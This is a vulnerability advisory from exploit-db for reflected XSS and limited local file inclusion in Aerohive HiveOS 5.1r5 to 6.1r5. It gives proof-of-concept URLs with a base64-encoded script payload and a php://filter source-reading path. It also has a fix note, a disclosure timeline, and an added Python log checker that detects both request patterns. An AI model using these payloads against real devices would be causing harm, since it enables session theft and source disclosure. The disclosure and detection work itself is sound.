
Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities

12 Jul 2014 00:00:00 | Reported by DearBytes | Type: exploitdb | Source: www.exploit-db.com

Aerohive HiveOS 5.1r5 < 6.1r5 contains XSS and limited LFI vulnerabilities.

Code
# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
# Date: 11-07-2014
# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
# Vendor Homepage: http://www.aerohive.com/products/overview.html
# Version: 5.1r5 - 6.1r5 (possibly earlier versions)

Description
================
Aerohive versions 5.1r5 through 6.1r5 contain two vulnerabilities: a reflected XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder; maybe you can leverage this further).
It's possible earlier versions are affected. I was only able to review 5.1r5 briefly; the vendor indicated other versions up to 6.1r5 are vulnerable as well.

Details
================
AeroHive HiveOS Version: 5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
 
 
Vulnerability
================
An attacker could craft a URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.

 
Proof of concept XSS
====================
Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
echo -en '"><script>alert('XSS');</script>' | base64
Add the output to the ERROR_INFO variable.

Example:
http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+

Proof of concept LFI
====================
Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>

Example:
http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP


Fix
================
The vulnerabilities were resolved in version 6.1r5.
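
Added example (not part of the original advisory): a Python check for web access logs on devices not yet upgraded, flagging the two request patterns shown in the proofs of concept above. The sample request targets, and the assumption that a legitimate ERROR_INFO value decodes to plain text without angle brackets, are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate decoded error message never contains angle brackets.
MARKUP = re.compile(r"[<>]")
# A URL-style scheme (php://, file://, data:) or directory traversal in _page.
WRAPPER = re.compile(r"^[a-z][a-z0-9+.\-]*:|\.\./", re.I)


def decode_b64(value):
    """Best-effort base64 decode; returns None if the value is not base64."""
    value = value.replace(" ", "+")  # parse_qs turns a literal '+' into a space
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", errors="replace")


def classify(request_target):
    """Return a list of findings for one request target (path plus query)."""
    parts = urlsplit(request_target)
    params = parse_qs(parts.query, keep_blank_values=True)
    page = parts.path.rsplit("/", 1)[-1].lower()
    findings = []
    if page == "index.php5":
        for value in params.get("ERROR_INFO", []):
            decoded = decode_b64(value)
            if decoded is not None and MARKUP.search(decoded):
                findings.append("xss:ERROR_INFO decodes to markup")
    if page == "action.php5":
        for value in params.get("_page", []):
            if WRAPPER.search(value):
                findings.append("lfi:_page uses a stream wrapper or traversal")
    return findings

# Constructed sample request targets, as they would appear in an access log.
SAMPLES = [
    "/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+",
    "/action.php5?_action=get&_actionType=1"
    "&_page=php://filter/convert.base64-encode/resource=ManagementAP",
    "/index.php5?ERROR_INFO=TG9naW4gZmFpbGVk",  # decodes to "Login failed"
    "/action.php5?_action=get&_actionType=1&_page=ManagementAP",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or ["clean"], target)
```

The first two samples are flagged and the last two pass; tune MARKUP and WRAPPER against the device's real traffic before alerting on them.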
 
 
Disclosure Timeline
================
 
2014-03-12: Reported to vendor
2014-03-12: Vendor confirmed, gave tracking-id
2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
2014-04-02: Requested status update
2014-04-02: Vendor indicates they once the new version is released
2014-07-07: Requested status update
2014-07-07: Vendor indicated the update was previously published
